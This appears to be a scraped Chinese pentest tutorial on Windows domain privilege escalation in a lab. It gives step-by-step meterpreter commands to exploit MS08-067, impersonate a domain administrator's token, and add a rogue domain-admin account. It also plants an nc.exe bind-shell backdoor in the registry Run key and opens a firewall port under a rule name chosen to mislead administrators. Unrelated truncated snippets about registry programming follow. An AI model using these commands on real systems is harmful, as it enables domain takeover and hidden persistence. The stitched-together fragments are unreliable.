token(令牌),域環境中提權
使用者每次登入時,賬號繫結臨時的token;
訪問資源時提交token進行身份驗證,類似於web cookie。
delegate token:互動會話登入,(例如直接登入、遠端桌面登入)
impersonate token:非互動登入,(例如訪問檔案共享)
注意:在域環境中,delegate token賬號登出後變成impersonate token,許可權依然有效。所以攻擊者一旦獲取域管理員的token後,危害極大!
例項:server 2003是域控制器,xp加入到域。
首先使用ms08-067漏洞,獲得xp的system許可權;
然後在域控制器上訪問xp的檔案共享(\\192.168.80.44\c$),建立乙個administrator使用者的impersonate token;
meterpreter > load incognito編輯登錄檔meterpreter > list_tokens -u
meterpreter > impersonate_token lab\\administrator 將自己偽裝成lab administrator使用者 (注意命令中是兩個\)
meterpreter > getuid 發現自己現在是域管理員
server username: lab\administrator
meterpreter > execute -f cmd.exe -i -t 獲得互動shell,-t(使用當前假冒的token執行程式)
c:\windows\system32>ipconfig /all 檢視xp的dns伺服器,即域控制器的ip位址
meterpreter > add_user coleradmin coleradmin1! -h 192.168.80.11 新增使用者
meterpreter > add_group_user "domain admins" coleradmin -h 192.168.80.11 給予域管理員許可權
登錄檔的滲透測試中的常見用途:修改、新增啟動項;竊取儲存在登錄檔中的機密資訊;繞過檔案型病毒查殺。
例項:編輯登錄檔,新增nc到系統啟動項中,形成後門程式。
meterpreter > upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32 將nc.exe上傳到目標主機在重啟之前,首先要設定防火牆允許444埠通過。meterpreter > reg enumkey -k hklm\\software\\microsoft\\windows\\currentversion\\run 列舉登錄檔的鍵值
meterpreter > reg setval -k hklm\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'c:\windows\system32\nc.exe -ldp 444 -e cmd.exe' 在當前主鍵下增加乙個nc鍵值
meterpreter > reg queryval -k hklm\\software\\microsoft\\windows\\currentversion\\run -v nc 檢視nc鍵值
meterpreter > execute -f cmd -i -h 最好加上-h引數,不然在目標主機上會彈出cmd視窗目標主機重啟後,在kali上使用nc連線它,獲得shell。c:\windows\system32> netsh firewall show opmode 檢視防火牆的狀態
c:\windows\system32>netsh firewall add portopening tcp 444 "網路發現(pub psd-out)" enable all 新增防火牆的規則允許444埠通過(這裡「網路發現(pub psd-out)」是規則名稱,這樣寫是為了迷惑管理員。)
root@kali:~# nc 192.168.80.33 444
c 登錄檔編輯
第五十三個regcreatekeyex在登錄檔裡建立乙個子鍵,或獲取乙個子鍵的控制代碼 在這裡我們先來了解一下登錄檔的基本概念,開啟執行對話方塊,輸入regedit,然後回車,便開啟了登錄檔編輯器,首先映入眼前的,便是五個根鍵 hkey classes root hkey current user ...
c 登錄檔編輯
在登錄檔中,最上面的節點是登錄檔配置單元 registry hive 有7個登錄檔配置單元,但用regedit只能看到5個 其餘的兩個鍵包含臨時資訊,這些資訊常常會更改 屬性name 鍵的名稱 唯讀 subkeycount 鍵的子鍵個數 valuecount 鍵包含的值的個數 方法close 關閉鍵...
域內批量分發登錄檔設定
適合讀者 網管 前置知識 域伺服器基本操作 域內批量分發登錄檔設定 我想很多網管朋友都遇到過這樣一種情況,就是需要在域內所有的機器上更改某項登錄檔設定,但如果一台一台地去修改,那實在是一件效率不高又累人的事情,我就曾遇到過這種情況,直到我自定義安全模板之後。因為通過自定義安全模板,我就可以在整個域範...